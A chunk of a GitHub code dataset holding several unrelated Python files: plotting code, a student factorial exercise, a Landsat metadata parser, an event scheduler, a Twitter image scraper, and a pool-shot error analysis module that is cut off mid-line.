possible_dims.update(ds[z].dims)\n ds = ds.drop_dims([k for k in ds.dims if k not in possible_dims])\n\n mapped = set()\n\n ds, hue = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"hue\", hue, hue_order, hue_label,\n custom_values=(\n [to_colormap(h, **autohue_opts) for h in hues]\n if hues is not None else None\n ),\n default_values=default_colormaps,\n )\n ds, color = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"color\", color, color_order, color_label,\n custom_values=colors,\n default_values=lambda N: np.linspace(colormap_start, colormap_stop, N)\n )\n\n if (hue is not None) and (color is not None):\n # need special label\n labels[f\"{hue}, {color}\"] = f\"{labels[hue]}, {labels[color]}\"\n\n if (hue is None) and (color is not None):\n # set a global colormap or sequence\n if colors is None:\n cmap_or_colors = (\n to_colormap(palette) if palette is not None else\n auto_colors(sizes[\"color\"])\n )\n else:\n cmap_or_colors = values[\"color\"]\n\n ds, marker = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"marker\", marker, marker_order, marker_label,\n custom_values=markers,\n default_values=itertools.cycle(_MARKERS_DEFAULT)\n )\n ds, markersize = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"markersize\", markersize, markersize_order, markersize_label,\n custom_values=markersizes,\n default_values=lambda N: np.linspace(3.0, 9.0, N)\n )\n ds, markeredgecolor = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"markeredgecolor\", markeredgecolor,\n markeredgecolor_order, markeredgecolor_label,\n custom_values=markeredgecolors,\n default_values=lambda N: auto_colors(N)\n )\n ds, linestyle = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"linestyle\", linestyle, linestyle_order, linestyle_label,\n custom_values=linestyles,\n default_values=itertools.cycle(_LINESTYLES_DEFAULT)\n )\n ds, linewidth = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"linewidth\", linewidth, linewidth_order, linewidth_label,\n custom_values=linewidths,\n default_values=lambda N: np.linspace(1.0, 3.0, N)\n )\n ds, col = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"col\", col, col_order, col_label,\n )\n ds, row = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"row\", row, row_order, row_label,\n )\n\n # compute which dimensions are not target or mapped dimensions\n unmapped = sorted(set(ds.dims) - mapped - {x, y, z, xlink})\n\n is_histogram = y is None\n if is_histogram:\n # assume we want a histogram: create y as probability density / counts\n import xarray as xr\n\n # bin over all unmapped dimensions\n ds = ds.stack({'__hist_dim__': unmapped})\n\n # work out the bin coordinates\n if bins is None or isinstance(bins, int):\n if bins is None:\n nbins = min(max(3, int(ds['__hist_dim__'].size ** 0.5)), 50)\n else:\n nbins = bins\n xmin, xmax = ds[x].min(), ds[x].max()\n bins = np.linspace(xmin, xmax, nbins + 1)\n elif not isinstance(bins, np.ndarray):\n bins = np.asarray(bins)\n\n bin_coords = (bins[1:] + bins[:-1]) / 2\n\n if bins_density:\n y = f'prob({x})'\n else:\n y = f'count({x})'\n\n if ylabel is None:\n labels[y] = y\n else:\n labels[y] = ylabel\n\n ds = (\n xr.apply_ufunc(\n lambda x: np.histogram(x, bins=bins, density=bins_density)[0],\n ds[x],\n input_core_dims=[['__hist_dim__']],\n output_core_dims=[[x]],\n vectorize=True,\n )\n .to_dataset(name=y)\n .assign_coords({x: bin_coords})\n )\n kwargs.setdefault(\"drawstyle\", \"steps-mid\")\n\n # get the target data array and possibly aggregate some dimensions\n if aggregate:\n if aggregate is True:\n # select all unmapped dimensions\n aggregate = unmapped\n\n # compute data ranges to maybe show spread bars or bands\n if aggregate_err_range == \"std\":\n\n da_std_mean = ds[y].mean(aggregate)\n da_std = ds[y].std(aggregate)\n\n da_ql = da_std_mean - da_std\n da_qu = da_std_mean + da_std\n\n elif aggregate_err_range == \"stderr\":\n\n da_stderr_mean = ds[y].mean(aggregate)\n da_stderr_cnt = ds[y].notnull().sum(aggregate)\n da_stderr = ds[y].std(aggregate) / np.sqrt(da_stderr_cnt)\n\n da_ql = da_stderr_mean - da_stderr\n da_qu = da_stderr_mean + da_stderr\n\n else:\n aggregate_err_range = min(max(0.0, aggregate_err_range), 1.0)\n ql = 0.5 - aggregate_err_range / 2.0\n qu = 0.5 + aggregate_err_range / 2.0\n da_ql = ds[y].quantile(ql, aggregate)\n da_qu = ds[y].quantile(qu, aggregate)\n\n # default to showing spread as bands\n if err is None:\n err = True\n if err_style is None:\n err_style = \"band\"\n\n # main data for central line\n ds = getattr(ds, aggregate_method)(aggregate)\n\n # default to bars if err not taken from aggregating\n if err_style is None:\n err_style = 'bars'\n\n # all the coordinates we will iterate over\n remaining_dims = []\n remaining_sizes = []\n for dim, sz in ds.sizes.items():\n if dim not in (x, y, z, xlink):\n remaining_dims.append(dim)\n remaining_sizes.append(sz)\n ranges = list(map(range, remaining_sizes))\n\n # maybe create the figure and axes\n if ax is not None:\n if axs is not None:\n raise ValueError(\"cannot specify both `ax` and `axs`\")\n axs = np.array([[ax]])\n\n if axs is None:\n if figsize is None:\n if width is None:\n width = height\n if height is None:\n height = width\n figsize = (width * sizes[\"col\"], height * sizes[\"row\"])\n\n fig, axs = plt.subplots(\n sizes[\"row\"], sizes[\"col\"],\n sharex=sharex, sharey=sharey,\n squeeze=False,\n gridspec_kw={'hspace': hspace, 'wspace': wspace},\n figsize=figsize,\n )\n fig.patch.set_alpha(0.0)\n else:\n fig = None\n\n if (fig is not None) and (title is not None):\n fig.suptitle(title)\n\n if z is not None:\n return _plot_pcolormesh(\n ds,\n x,\n y,\n z,\n ranges,\n remaining_dims,\n row,\n col,\n axs,\n palette,\n fig,\n format_axs,\n labels,\n domains,\n sizes,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n )\n\n # iterate over and plot all data\n handles = {}\n split_handles = collections.defaultdict(\n lambda: collections.defaultdict(dict)\n )\n\n x_is_constant = (x not in ds.data_vars)\n if x_is_constant:\n # is a constant coordinate\n xdata = ds[x].values\n\n for iloc in itertools.product(*ranges):\n # current coordinates\n loc = dict(zip(remaining_dims, iloc))\n\n # get the right set of axes to plot on\n if row is not None:\n i_ax = loc[row]\n else:\n i_ax = 0\n if col is not None:\n j_ax = loc[col]\n else:\n j_ax = 0\n ax = axs[i_ax, j_ax]\n\n # map coordinate into relevant styles and keep track of each uniquely\n sub_key = {}\n specific_style = {}\n\n # need to handle hue and color separately\n if color is not None:\n if hue is not None:\n ihue = loc[hue]\n hue_in = domains[\"hue\"][ihue]\n sub_key[hue] = hue_in\n cmap_or_colors = values[\"hue\"][ihue]\n\n icolor = loc[color]\n color_in = domains[\"color\"][icolor]\n if not callable(cmap_or_colors):\n color_out = cmap_or_colors[icolor]\n else:\n color_out = cmap_or_colors(values[\"color\"][icolor])\n\n sub_key[color] = color_in\n specific_style[\"color\"] = color_out\n if hue is None:\n legend_dim = color\n legend_in = color_in\n else:\n legend_dim = \", \".join((hue, color))\n legend_in = \", \".join(map(str, (hue_in, color_in)))\n\n split_handles[legend_dim][legend_in][\"color\"] = color_out\n else:\n legend_dim = None\n\n for prop, dim in [\n (\"marker\", marker),\n (\"markersize\", markersize),\n (\"markeredgecolor\", markeredgecolor),\n (\"linewidth\", linewidth),\n (\"linestyle\", linestyle),\n ]:\n if dim is not None:\n idx = loc[dim]\n prop_in = domains[prop][idx]\n prop_out = values[prop][idx]\n sub_key[dim] = prop_in\n specific_style[prop] = prop_out\n\n if dim in (color, hue):\n split_handles[legend_dim][legend_in][prop] = prop_out\n else:\n split_handles[dim][prop_in][prop] = prop_out\n\n # get the masked x and y data\n ds_loc = ds.isel(loc)\n mask = ds_loc[y].notnull().values\n\n if not x_is_constant:\n # x also varying\n xdata = ds_loc[x].values\n # both x and y must be non-null\n mask &= ds_loc[x].notnull().values\n\n if not np.any(mask):\n # don't plot all null lines\n continue\n\n if not join_across_missing:\n # reset mask\n data_mask = ()\n else:\n data_mask = mask\n\n xmdata = xdata[data_mask]\n ymdata = ds_loc[y].values[data_mask]\n\n if (err is not None):\n\n if (err is True) and (aggregate is not None):\n da_ql_loc = da_ql.isel(loc)\n da_qu_loc = da_qu.isel(loc)\n y1 = da_ql_loc.values[data_mask]\n y2 = da_qu_loc.values[data_mask]\n yneg = ymdata - y1\n ypos = y2 - ymdata\n else:\n yerr_mdata = ds_loc[err].values[data_mask]\n yneg = - yerr_mdata\n ypos = + yerr_mdata\n y1 = ymdata + yneg\n y2 = ymdata + ypos\n\n if err_style == 'bars':\n ax.errorbar(\n x=xmdata, y=ymdata, yerr=[np.abs(yneg), np.abs(ypos)],\n fmt='none',\n capsize=err_bar_capsize,\n **{**base_style, **specific_style, **err_kws},\n )\n elif err_style == 'band':\n ax.fill_between(\n x=xmdata, y1=y1, y2=y2,\n color=specific_style.get(\"color\", base_style[\"color\"]),\n alpha=err_band_alpha,\n **err_kws,\n )\n\n if is_histogram:\n ax.fill_between(\n x=xmdata, y1=ymdata, y2=0,\n step={\n None: None,\n 'default': None,\n 'steps': 'pre',\n 'steps-pre': 'pre',\n 'steps-mid': 'mid',\n 'steps-post': 'post',\n }[kwargs.get(\"drawstyle\", None)],\n color=mpl.colors.to_rgb(\n specific_style.get(\"color\", base_style[\"color\"])\n ),\n alpha=err_band_alpha,\n )\n\n plot_opts = {**base_style, **specific_style}\n\n # do the plotting!\n handle, = ax.plot(\n xmdata, ymdata,\n label=\", \".join(map(str, sub_key.values())),\n **plot_opts, **kwargs,\n )\n\n # add a text label next to each point\n if text is not None:\n # need raw mask for text\n smdata = ds_loc[text].values[mask]\n for txx, txy, txs in zip(xdata[mask], ds_loc[y].values[mask], smdata):\n\n specific_text_opts = {}\n if 'color' not in text_opts:\n # default to line color\n specific_text_opts['color'] = plot_opts['color']\n\n ax.text(\n txx, txy, text_formatter(txs),\n **text_opts, **specific_text_opts,\n )\n\n # only want one legend entry per unique style\n key = frozenset(sub_key.items())\n handles.setdefault(key, handle)\n\n if (fig is not None) or format_axs is True:\n _do_axes_formatting(\n axs,\n col,\n row,\n labels,\n domains,\n sizes,\n x,\n y,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n )\n\n # create a legend\n if legend:\n _create_legend(\n axs,\n legend_opts,\n handles,\n legend_merge,\n legend_entries,\n legend_labels,\n legend_extras,\n hue,\n hue_order,\n color,\n color_order,\n marker,\n marker_order,\n markersize,\n markersize_order,\n markeredgecolor,\n markeredgecolor_order,\n linewidth,\n linewidth_order,\n linestyle,\n linestyle_order,\n labels,\n legend_reverse,\n legend_ncol,\n sizes,\n split_handles,\n base_style,\n )\n\n return fig, axs\n\n\ndef _plot_pcolormesh(\n ds,\n x,\n y,\n z,\n ranges,\n remaining_dims,\n row,\n col,\n axs,\n palette,\n fig,\n format_axs,\n labels,\n domains,\n sizes,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n):\n import matplotlib as mpl\n\n xdata = ds[x].values\n ydata = ds[y].values\n\n zdata_all = ds[z].values\n zdata_all = zdata_all[np.isfinite(zdata_all)]\n zmax = np.max(zdata_all)\n zmin = np.min(zdata_all)\n max_mag = max(abs(zmax), abs(zmin))\n\n norm = mpl.colors.Normalize(vmin=zmin, vmax=zmax)\n\n for iloc in itertools.product(*ranges):\n # current coordinates\n loc = dict(zip(remaining_dims, iloc))\n\n # get the right set of axes to plot on\n if row is not None:\n i_ax = loc[row]\n else:\n i_ax = 0\n if col is not None:\n j_ax = loc[col]\n else:\n j_ax = 0\n ax = axs[i_ax, j_ax]\n\n zdata = ds[z].isel(loc).transpose(y, x).values\n\n # get the masked x and y data\n if palette is None:\n C = zdata\n mask = np.isfinite(C)\n zdata = np.empty(C.shape + (4,))\n zdata[mask] = to_colors(C[mask], alpha_pow=0.0, max_mag=max_mag)[0]\n zdata[~mask] = (.5, .5, .5, .5)\n else:\n zdata = ds[z].isel(loc).transpose(y, x).values\n # mask = daz.notnull().values\n\n ax.pcolormesh(\n xdata,\n ydata,\n zdata,\n shading=\"nearest\",\n # edgecolors=\"face\",\n rasterized=True,\n cmap=palette,\n )\n\n if (fig is not None) or format_axs is True:\n _do_axes_formatting(\n axs,\n col,\n row,\n labels,\n domains,\n sizes,\n x,\n y,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n )\n\n if True:\n if (palette is None):\n add_visualize_legend(\n ax=axs[-1, -1],\n complexobj=False,\n max_mag=1,\n legend_loc=(1.1, 0.8),\n legend_size=0.2,\n # complexobj=np.iscomplexobj(array),\n # max_mag=max_mag,\n # max_projections=max_projections,\n # legend_loc=legend_loc,\n # legend_size=legend_size,\n # legend_bounds=legend_bounds,\n # legend_resolution=legend_resolution,\n )\n else:\n norm = mpl.colors.Normalize(0, 1)\n cax = axs[0, -1].inset_axes((1.1, 0.1, 0.05, 0.8))\n\n fig.colorbar(\n mpl.cm.ScalarMappable(norm=norm, cmap=palette),\n cax=cax,\n orientation='vertical',\n label=_make_bold(z)\n )\n\n return fig, axs\n","repo_name":"jcmgray/xyzpy","sub_path":"xyzpy/plot/plotter_matplotlib.py","file_name":"plotter_matplotlib.py","file_ext":"py","file_size_in_byte":85274,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"} +{"seq_id":"39532057529","text":"def f_fatorial():\r\n x = 1\r\n numero = []\r\n fatorial = []\r\n while x <=(5):\r\n numero.append(int(input(\"Digite o número inteiros para calcular fatorial\")))\r\n x = + 1\r\n y = 1\r\n for y in range(len(elemento)):\r\n fat = numero[y]\r\n z = 1\r\n resultado_fat = 1\r\n while z <= fat:\r\n calculo = fat - z\r\n resultado_fat = (fat * calculo) * result_fat\r\n fatorial.append(resultado_fat)\r\n z = z + 1\r\n return fatorial\r\ndef main():\r\n print(f_fatorial())\r\nmain() \r\n \r\n \r\n","repo_name":"kevenescovedo/exercicios-python-func-o-2-semestre-ADS-conteudo-da-p1","sub_path":"lista function/Lista Com retorno e sem parametro/exercicio8[.py","file_name":"exercicio8[.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24139167280","text":"class mtl(object):\n\n def __init__(self):\n self.mult = []\n self.add = []\n\n self.date = []\n self.time = []\n\n self.sun_azimuth = 0\n self.sun_elevation = 0\n\n self.earth_sun_distance = 0\n\n self.lat_cen = 0\n self.lon_cen = 0\n\n self.pub_path = 'E:\\\\RSImg\\\\LC08_L1TP_119039_20201213_20210313_01_T1\\\\LC08_L1TP_119039_20201213_20210313_01_T1'\n\n def read_mtl(self):\n global ul_lat, ur_lat, ul_lon, ur_lon, ll_lon, lr_lon, lr_lat, ll_lat\n filename = self.pub_path + '_MTL.txt'\n f = open(filename, 'r')\n metadata = f.readlines()\n f.close()\n temp_line = 0\n\n for line in metadata:\n if line.__contains__('DATE_ACQUIRED'):\n arr = line.split('=')[1].split('-')\n for i in arr:\n self.date.append(float(i))\n elif line.__contains__('SCENE_CENTER_TIME'):\n arr = line.split('=')[1].split('\"')[1].split(':')\n for i in arr[0:2]:\n self.time.append(float(i))\n\n elif line.__contains__('SUN_AZIMUTH'):\n self.sun_azimuth = float(line.split('=')[1])\n elif line.__contains__('SUN_ELEVATION'):\n self.sun_elevation = float(line.split('=')[1])\n\n elif line.__contains__('CORNER_UL_LAT_PRODUCT'):\n ul_lat = float(line.split('=')[1])\n elif line.__contains__('CORNER_UL_LON_PRODUCT'):\n ul_lon = float(line.split('=')[1])\n elif line.__contains__('CORNER_UR_LAT_PRODUCT '):\n ur_lat = float(line.split('=')[1])\n elif line.__contains__('CORNER_UR_LON_PRODUCT'):\n ur_lon = float(line.split('=')[1])\n elif line.__contains__('CORNER_LL_LAT_PRODUCT'):\n ll_lat = float(line.split('=')[1])\n elif line.__contains__('CORNER_LL_LON_PRODUCT'):\n ll_lon = float(line.split('=')[1])\n elif line.__contains__('CORNER_LR_LAT_PRODUCT '):\n lr_lat = float(line.split('=')[1])\n elif line.__contains__('CORNER_LR_LON_PRODUCT'):\n lr_lon = float(line.split('=')[1])\n\n elif line.__contains__('EARTH_SUN_DISTANCE'):\n self.earth_sun_distance = float(line.split('=')[1])\n elif line.__contains__('RADIOMETRIC_RESCALING'):\n break\n temp_line += 1\n\n self.lat_cen = (ul_lat + ur_lat + ll_lat + lr_lat) / 4\n self.lon_cen = (ul_lon + ur_lon + ll_lon + lr_lon) / 4\n\n rad_mult = metadata[temp_line + 1:temp_line + 12]\n rad_add = metadata[temp_line + 12:temp_line + 23]\n\n for line in rad_mult:\n self.mult.append(float(line.split('=')[1]))\n for line in rad_add:\n self.add.append(float(line.split('=')[1]))\n","repo_name":"wudong1997/RSImgProsecessing","sub_path":"readMTL.py","file_name":"readMTL.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"14289829115","text":"# Archivo reto10.py\n## crear variables desde un diccionario\ndef reto10():\n dict = {'titulo':'El Más Allá',\n 'aka':'E tu vivrai nel terrore - Laldilà',\n 'director':'Lucio Fulci', \n 'año':1981, \n 'país':'Italia'}\n ### crear lista de los valores:\n valores =[]\n for llave, valor in dict.items():\n valores.append(valor)\n print(valores)\n ### creaer variables con los nombres: var0, var1, var2, ...\n for n, val in enumerate(valores):\n globals()[\"var%d\"%n] = val\n print(f\"\"\" \n titulo: {var0}\n aka: {var1}\n director: {var2}\n año: {var3}\n país: {var4}\"\"\") \n ### o con la manera manual:\n titulo = dict['titulo']\n aka = dict['aka']\n director = dict['director']\n anio = dict['año']\n pais = dict['país']","repo_name":"frkroe/EDEM2022","sub_path":"1Fundamentos/Python/Retos/faciles/reto10.py","file_name":"reto10.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40183048287","text":"from dataclasses import dataclass, field\nfrom typing import List, Dict\nimport pandas as pd\nimport numpy as np\nimport logging as log\n\n\n@dataclass(frozen=True, order=True)\nclass Side:\n \"\"\"Side Class, represents agents.\"\"\"\n name: str\n size: int = 1\n \n def __repr__(self) -> str:\n return self.name\n\n\n@dataclass\nclass Event:\n \"\"\"Event consisting of sides, spots and timeslots.\"\"\"\n name: str\n slots: int = 1\n spots: List[str] = field(default_factory=list)\n sides: List[Side] = field(default_factory=list)\n freq_side: pd.DataFrame = field(default_factory=pd.DataFrame)\n freq_spot: pd.DataFrame = field(default_factory=pd.DataFrame)\n shedule: List[Dict[str, List[Side]]] = field(default_factory=list)\n \n\n def __init__(\n self, \n name: str, \n spots: List[str], \n sides: List[Side],\n slots: int\n ) -> None:\n\n self.name = name\n self.slots = slots\n self.spots = sorted(list(spots))\n self.sides = sorted(list(sides))\n \n self.freq_side = pd.DataFrame(\n np.zeros([len(self.sides)] * 2, dtype=\"int\"),\n index=self.sides,\n columns=self.sides\n )\n self.freq_spot = pd.DataFrame(\n np.zeros((len(self.sides), len(self.spots)), dtype=\"int\"),\n index=self.sides,\n columns=self.spots\n )\n\n self.timetable = [\n {spot: [] for spot in self.spots} \n for _ in range(slots)\n ]\n \n def get_timeslot(self, time: int) -> Dict[str, List]:\n return self.timetable[time]\n \n def _update_freq_side(self) -> None:\n log.info(\"Updating side frequency\")\n _freq_side: pd.DataFrame = pd.DataFrame(\n np.zeros([len(self.sides)] * 2, dtype=\"int\"),\n index=self.sides,\n columns=self.sides\n )\n \n all_groups = [group for slot in self.timetable for group in slot.values()]\n \n for side in self.sides:\n for grouping in all_groups:\n for c_side in grouping:\n if c_side in grouping and side in grouping:\n _freq_side.loc[side, c_side] += 1 # type: ignore [Custom index Side]\n \n self.freq_side = _freq_side\n \n \n def _update_freq_spot(self) -> None:\n log.info(\"Updating spot frequency\")\n _freq_spot: pd.DataFrame = pd.DataFrame(\n np.zeros((len(self.sides), len(self.spots)), dtype=\"int\"),\n index=self.sides,\n columns=self.spots\n )\n \n for side in self.sides:\n for timeslot in self.timetable:\n for spot, sides in timeslot.items():\n if side in sides:\n _freq_spot.loc[side, spot] += 1 # type: ignore [Custom index Side]\n \n self.freq_spot = _freq_spot\n \n \n def update_freqs(self) -> None:\n \"\"\"Update frequency metrics.\"\"\"\n self._update_freq_side()\n self._update_freq_spot()\n","repo_name":"JoeBlackSci/sidesched","sub_path":"sidesched/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22713128662","text":"from SeleniumDriverCreator import SeleniumDriverCreator\nfrom selenium.webdriver.common.by import By\nimport time\nfrom Constants import Constants\nimport re\nfrom Database import Database\nimport StaticMethods\n\n\n\ndef getImage():\n driverCreator = SeleniumDriverCreator()\n driver = driverCreator.createDriver()\n driver.get(Constants.twitterUrl)\n time.sleep(15)\n checkForAdultButton(driver)\n driver.get_screenshot_as_file(\"twitterShot.png\")\n element = driver.find_elements(By.TAG_NAME, 'img')\n if len(element) > 0:\n reString = r'^https:\\/\\/pbs.twimg.com\\/media\\/.+small$'\n images = []\n for ele in element:\n if re.search(reString,ele.get_attribute('src')):\n images.append(ele.get_attribute('src'))\n if len(images) > 0:\n imageSrc = getTwImgDb(images)\n else:\n imageSrc = 'images/twitErrImg.jpg'\n print(\"twitter image grabber isn't working for some reason. No images in element. All models images may be marked as 18+.\")\n else:\n imageSrc = 'images/twitErrImg.jpg'\n print(\"twitter image grabber isn't working for some reason. No elements.\")\n driver.quit()\n return imageSrc\n\ndef checkForAdultButton(driver):\n button = driver.find_elements(By.XPATH, \"/html/body/div[1]/div/div/div[2]/main/div/div/div/div[1]/div/div[3]/div/div/div[2]/div/div[3]\")\n if len(button) > 0:\n button[0].click()\n time.sleep(10)\n\ndef getTwImgDb(images):\n db = Database()\n twImgList, twImgQue, bannedList = db.getTwImgStuff()\n if not twImgList:\n db.setTwImgList(images)\n db.setTwImgQueue(images)\n twImgList = images\n twImgQue = images\n elif images[0] not in twImgList and images[0] not in bannedList:\n StaticMethods.pinImage(images[0],Constants.PIN_TIME_LONG)\n twImgList.insert(0, images[0])\n db.setTwImgList(twImgList)\n elif not twImgQue:\n twImgQue = twImgList\n url = StaticMethods.checkImagePin()\n if url:\n imageSrc = url\n else:\n imageSrc = twImgQue.pop(0)\n db.setTwImgQueue(twImgQue)\n return imageSrc","repo_name":"Bombg/SassBot","sub_path":"TwitterImageGrabber.py","file_name":"TwitterImageGrabber.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"478707784","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import collections as mc\nimport matplotlib.image as mpimg\nfrom pool import utils\n\nclass VisionErrorAnalysis:\n \n def __init__(self, \n pockets=None,\n ball_radius=None,\n pool_table_size=None\n ):\n params=utils.Params()\n if pockets is None:\n self.pockets=np.array(params.POCKETS_MM) \n else: \n self.pockets=pockets\n if ball_radius is None:\n self.ball_radius=params.BALL_RADIUS_MM\n else:\n self.ball_radius=ball_radius\n if pool_table_size is None:\n self.pool_table_size=params.DISPLAY_SIZE_MM\n else:\n self.pool_table_size=pool_table_size\n\n def generate_combinations_vision_system(self, num_real_points, num_estimated_points, maximum_error_vision_system):\n safety_distance=3*self.ball_radius #so the balls dont touch the pool table walls\n #real points configs\n C=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n T=utils.generate_random_numbers_inside_rectangle(num_real_points,self.pool_table_size,safety_distance)\n index_real = np.arange(num_real_points)\n CT = np.c_[index_real, C, T]\n #estimated points configs\n index_estimated = np.arange(num_estimated_points).reshape(-1,1)\n CT_extended=utils.get_row_combinations_of_two_arrays(CT, index_estimated)\n C_extended = CT_extended[:,1:3]\n T_extended = CT_extended[:,3:5]\n C_estimated=utils.generate_random_number_inside_circle(C_extended,maximum_error_vision_system)\n T_estimated=utils.generate_random_number_inside_circle(T_extended,maximum_error_vision_system)\n CT_real_and_estimated = np.c_[CT_extended, C_estimated, T_estimated]\n #pockets configs\n index_pocket = np.arange(1,7)\n pockets = np.c_[index_pocket,self.pockets]\n comb = utils.get_row_combinations_of_two_arrays(CT_real_and_estimated, pockets)\n df=pd.DataFrame({'real_point_id':comb[:,0],\n 'C_x':comb[:,1],\n 'C_y':comb[:,2],\n 'T_x':comb[:,3],\n 'T_y':comb[:,4],\n 'estimated_point_id':comb[:,5],\n 'C_estimated_x':comb[:,6],\n 'C_estimated_y':comb[:,7],\n 'T_estimated_x':comb[:,8],\n 'T_estimated_y':comb[:,9],\n 'pocket_id':comb[:,10],\n 'P_x':comb[:,11],\n 'P_y':comb[:,12]})\n return df\n\n def compute_geometric_parameters(self, df):\n \"\"\"\n \"\"\"\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n r=self.ball_radius\n\n # we calculate d and b using T and C points\n d=np.linalg.norm(T-C, axis=1)\n b=np.linalg.norm(T-P, axis=1)\n\n #To compute a and alpha we need to use cos and sin rules\n beta=np.pi-utils.angle_between_3_points(C,T,P)\n #beta=angle_abc(C_arr,T_arr,X_arr)\n #phi=angle_abc(T_arr,C_arr,np.array([1,0]))\n a=np.sqrt(d**2+(2*r)**2-2*d*(2*r)*np.cos(beta))\n alpha=np.arcsin(2*r*np.sin(beta)/a)\n #alpha=angle_abc(X_arr,C_arr,T_arr)\n\n df['b']=b\n df['a']=a\n df['d']=d\n df['beta']=beta\n df['alpha']=alpha\n\n return df\n \n def compute_X(self, df):\n\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n b=np.linalg.norm(T-P, axis=1)\n r=self.ball_radius\n\n # virtual point X \n # we parametrize the line PT equation and compute the point \n # that is 2*r distance from T\n t=1+2*r*(1/b)\n x_x=P[:,0]+(T[:,0]-P[:,0])*t\n y_x=P[:,1]+(T[:,1]-P[:,1])*t\n X=np.column_stack([x_x,y_x]) \n df['X_x']=X[:,0]\n df['X_y']=X[:,1]\n return df\n \n def compute_X_estimated(self, df):\n\n T_estimated=df[['T_estimated_x','T_estimated_y']].values\n P=df[['P_x','P_y']].values\n b=np.linalg.norm(T_estimated-P, axis=1)\n r=self.ball_radius\n\n # virtual point X \n # we parametrize the line PT equation and compute the point \n # that is 2*r distance from T\n t=1+2*r*(1/b)\n x_x=P[:,0]+(T_estimated[:,0]-P[:,0])*t\n y_x=P[:,1]+(T_estimated[:,1]-P[:,1])*t\n X_estimated=np.column_stack([x_x,y_x]) \n df['X_estimated_x']=X_estimated[:,0]\n df['X_estimated_y']=X_estimated[:,1]\n return df\n\n def valid_CT_points(self, df):\n df[df['d']>2.5*self.ball_radius]\n return df\n\n def cue_ball_trajectory(self, df):\n \"\"\"\n \n \"\"\"\n C=df[['C_x','C_y']].values\n C_estimated=df[['C_estimated_x','C_estimated_y']].values\n X_estimated=df[['X_estimated_x','X_estimated_y']].values\n r=self.ball_radius\n \n #line parallel to C'X' that goes trough C\n slope=(X_estimated[:,1]-C_estimated[:,1])/(X_estimated[:,0]-C_estimated[:,0])\n intercept=C[:,1]-slope*C[:,0]\n\n return slope,intercept\n\n\n def compute_Q_vision_system(self, df): \n\n C=df[['C_x','C_y']].values\n T=df[['T_x','T_y']].values\n P=df[['P_x','P_y']].values\n r=self.ball_radius\n\n slope, intercept = self.cue_ball_trajectory(df)\n\n X_calculated1,X_calculated2=utils.intersection_circle_line(slope, intercept,r,T)\n\n distCX_calculated1 = np.linalg.norm(C-X_calculated1, axis=1)\n distCX_calculated2 = np.linalg.norm(C-X_calculated2, axis=1)\n\n # we choose the point of intersection that is closest to C\n Cond1 = (distCX_calculated10)\n \n a = np.cross(P[clockwise] - X1[clockwise], T[clockwise] - X1[clockwise]) > 0\n b = np.cross(P[clockwise] - X2[clockwise], T[clockwise] - X2[clockwise]) < 0\n cw_cond=(a & b)\n\n X1_counterclock=X2\n X2_counterclock=X1\n a = np.cross(P[counter_clockwise] - X1_counterclock[counter_clockwise], T[counter_clockwise] - X1_counterclock[counter_clockwise]) < 0\n b = np.cross(P[counter_clockwise] - X2_counterclock[counter_clockwise], T[counter_clockwise] - X2_counterclock[counter_clockwise]) > 0\n ccw_cond=(a & b)\n\n cond=np.full((T.shape[0], ), True)\n cond[clockwise]=cw_cond\n cond[counter_clockwise]=ccw_cond\n\n return df[cond]\n \n def get_error_data_vision_system(self,\n num_real_points,\n num_estimated_points,\n maximum_error_vision_system):\n\n df=self.generate_combinations_vision_system(num_real_points, \n num_estimated_points, \n maximum_error_vision_system)\n df=self.compute_geometric_parameters(df)\n df=self.compute_X(df)\n df=self.compute_X_estimated(df)\n df=self.pockets_inside_region_of_interest(df)\n df=self.valid_CT_points(df)\n df=self.compute_Q_vision_system(df)\n\n return df\n \nclass ActuatorErrorAnalysis(VisionErrorAnalysis):\n def __init__(self,\n pockets=None,\n ball_radius=None,\n pool_table_size=None):\n super().__init__(pockets, ball_radius,pool_table_size)\n\n def generate_combinations_actuator(self, num_real_points, deviation_angle, number_of_angles):\n safety_distance=3*self.ball_radius #so the balls dont 